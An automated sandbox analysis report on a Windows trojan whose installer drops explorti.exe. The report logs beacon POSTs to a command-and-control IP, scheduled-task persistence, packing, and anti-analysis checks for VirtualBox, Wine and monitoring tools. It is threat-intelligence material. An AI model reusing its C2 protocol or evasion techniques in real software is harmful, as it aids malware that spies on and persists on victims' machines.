                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 41 32 44 37 37 42 39 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FBA2D77B95082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: Joe Sandbox View IP Address: 185.215.113.19
                    Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL
                    Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.19
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_00F5BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,6_2_00F5BD60
                    Source: unknownHTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/
                    Source: explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/=
                    Source: explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000006.00000002.2883573047.00000000006E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.19/Vi9leo/index.php

                    System Summary

                    Source: setup.exeStatic PE information: section name:
                    Source: setup.exeStatic PE information: section name: .idata
                    Source: setup.exeStatic PE information: section name:
                    Source: explorti.exe.0.drStatic PE information: section name:
                    Source: explorti.exe.0.drStatic PE information: section name: .idata
                    Source: explorti.exe.0.drStatic PE information: section name:
                    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Windows\Tasks\explorti.jobJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_00F54CF06_2_00F54CF0
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_00F930686_2_00F93068
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_00F5E4406_2_00F5E440
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_00F87D836_2_00F87D83
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_00F54AF06_2_00F54AF0
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_00F9765B6_2_00F9765B
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_00F92BD06_2_00F92BD0
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_00F9777B6_2_00F9777B
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_00F987206_2_00F98720
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_00F96F096_2_00F96F09
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe 589EB31A43D44FE275C70BFC3F592965B9236B59645A7ED633BBEC66526D64AB
                    Source: setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: setup.exeStatic PE information: Section: ZLIB complexity 0.9998612534153005
                    Source: setup.exeStatic PE information: Section: usoriijt ZLIB complexity 0.9945536283368326
                    Source: explorti.exe.0.drStatic PE information: Section: ZLIB complexity 0.9998612534153005
                    Source: explorti.exe.0.drStatic PE information: Section: usoriijt ZLIB complexity 0.9945536283368326
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/3@0/1
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7Jump to behavior
                    Source: C:\Users\user\Desktop\setup.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: setup.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: explorti.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: C:\Users\user\Desktop\setup.exeFile read: C:\Users\user\Desktop\setup.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
                    Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: acgenral.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: msacm32.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: mstask.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: dui70.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: duser.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: chartv.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: atlthunk.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                    Source: setup.exeStatic file information: File size 1909760 > 1048576
                    Source: setup.exeStatic PE information: Raw size of usoriijt is bigger than: 0x100000 < 0x1a0c00

                    Data Obfuscation

                    Source: C:\Users\user\Desktop\setup.exeUnpacked PE file: 0.2.setup.exe.3c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeUnpacked PE file: 1.2.explorti.exe.f50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeUnpacked PE file: 2.2.explorti.exe.f50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeUnpacked PE file: 6.2.explorti.exe.f50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW;
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                    Source: explorti.exe.0.drStatic PE information: real checksum: 0x1d3ae7 should be: 0x1d959a
                    Source: setup.exeStatic PE information: real checksum: 0x1d3ae7 should be: 0x1d959a
                    Source: setup.exeStatic PE information: section name:
                    Source: setup.exeStatic PE information: section name: .idata
                    Source: setup.exeStatic PE information: section name:
                    Source: setup.exeStatic PE information: section name: usoriijt
                    Source: setup.exeStatic PE information: section name: ymfuwjgb
                    Source: setup.exeStatic PE information: section name: .taggant
                    Source: explorti.exe.0.drStatic PE information: section name:
                    Source: explorti.exe.0.drStatic PE information: section name: .idata
                    Source: explorti.exe.0.drStatic PE information: section name:
                    Source: explorti.exe.0.drStatic PE information: section name: usoriijt
                    Source: explorti.exe.0.drStatic PE information: section name: ymfuwjgb
                    Source: explorti.exe.0.drStatic PE information: section name: .taggant
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_00F6D84C push ecx; ret 6_2_00F6D85F
                    Source: setup.exeStatic PE information: section name: entropy: 7.983026486073879
                    Source: setup.exeStatic PE information: section name: usoriijt entropy: 7.952894618410208
                    Source: explorti.exe.0.drStatic PE information: section name: entropy: 7.983026486073879
                    Source: explorti.exe.0.drStatic PE information: section name: usoriijt entropy: 7.952894618410208
                    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeJump to dropped file

                    Boot Survival

                    Source: C:\Users\user\Desktop\setup.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: FilemonclassJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Windows\Tasks\explorti.jobJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    Source: C:\Users\user\Desktop\setup.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 42F434 second address: 42F438 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 42F438 second address: 42F43E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5B3639 second address: 5B363F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5B363F second address: 5B3649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5ACE5B second address: 5ACE66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5FA004 second address: 5FA00A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5FA00A second address: 5FA02D instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC169461A98h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC169461AA4h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5F93B3 second address: 5F93B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5FB27D second address: 5FB283 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5FC25C second address: 5FC260 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5FC260 second address: 5FC26E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FC169461A9Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5FF2DA second address: 5FF2DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6020C4 second address: 6020CA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6020CA second address: 6020DE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 jng 00007FC16945A282h 0x0000000c jns 00007FC16945A276h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 600207 second address: 60020B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6002D7 second address: 6002E8 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC16945A276h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 6002E8 second address: 6002FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC169461A9Eh 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 609474 second address: 609496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b jo 00007FC16945A287h 0x00000011 jmp 00007FC16945A27Fh 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5AE86E second address: 5AE878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5AE878 second address: 5AE89A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC16945A281h 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007FC16945A276h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5AE89A second address: 5AE8A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5AE8A6 second address: 5AE8B0 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC16945A276h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5AE8B0 second address: 5AE8D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jnc 00007FC169461A96h 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC169461AA3h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 608F6A second address: 608F87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A283h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 608F87 second address: 608F8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 608F8C second address: 608F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 608F92 second address: 608FA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 608FA1 second address: 608FA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 608FA5 second address: 608FB1 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC169461A96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 608FB1 second address: 608FB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 608FB7 second address: 608FD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC169461AA5h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 60AA3C second address: 60AA52 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC16945A276h 0x00000008 jns 00007FC16945A276h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
